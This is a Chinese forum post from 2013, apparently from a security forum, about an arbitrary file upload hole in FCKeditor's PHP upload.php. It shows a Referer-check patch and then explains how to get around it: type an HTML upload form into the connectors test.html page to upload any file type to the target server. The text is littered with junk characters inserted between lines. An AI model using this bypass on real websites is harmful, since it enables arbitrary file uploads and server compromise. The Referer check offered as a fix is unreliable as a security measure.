漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
2 U1 j9 u. a+ _网上给出的修复方案是
& P5 K/ {, K+ O" K- ^修复方法,删除FCK编辑器用其他的编辑器1 p2 a7 C5 D; V2 }! {
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件' n8 A/ J. J! \7 j
在
7 v& b$ J. G6 x& u" T+ J0 j2 T0 A/ Rrequire(‘config.php’);& H: d0 o' i' {4 m, A
require(‘util.php’);/ T: [* l" h; V( ~/ w0 ^; Q4 s* m9 G
的下面添加以下代码—————————–
* \0 |4 i, L: h' }: ], \//防止外部提交
: Y5 p- n/ I7 O% N! q! Z: R! Zfunction outsidepost()
q8 f `. d0 h( p& t# z{" ? ?" K) {1 Y" i. S0 E2 o
$servername=$_SERVER['SERVER_NAME'];/ Y/ G: p6 v4 W7 o5 X* m
$sub_from=@$_SERVER['HTTP_REFERER'];6 O3 ]& Z) |0 }/ r
$sub_len=strlen($servername);
; @- v! f+ Z. f0 S- _! U; h* C0 J$checkfrom=substr($sub_from,7,$sub_len);
1 H5 ]! V _1 N) ?1 Dif($checkfrom!=$servername){, x" K( h% y0 ^; i; A& `- K1 T8 S
echo(“you don’t outsidepost!”);$ ^" v$ [/ |* N% m
exit;5 U: M& c0 d! s. D: z
}3 I y& o& v" @8 n
}
0 j1 E* v* r7 ~& aoutsidepost();: r9 d. m, m/ m- w. L8 h7 q3 ]
防止外部提交,但是没有防止内部提交,( f) J1 d7 a5 X* \6 A
利用方法:
: N! |* B+ _5 N) K0 O1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
9 p7 L# X, H0 S2,在Current Folder 框输入" q+ p) H% x! V3 F8 X
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
9 B, z7 C% v" m- T* A' y* A然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 h& |1 I5 b0 c
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对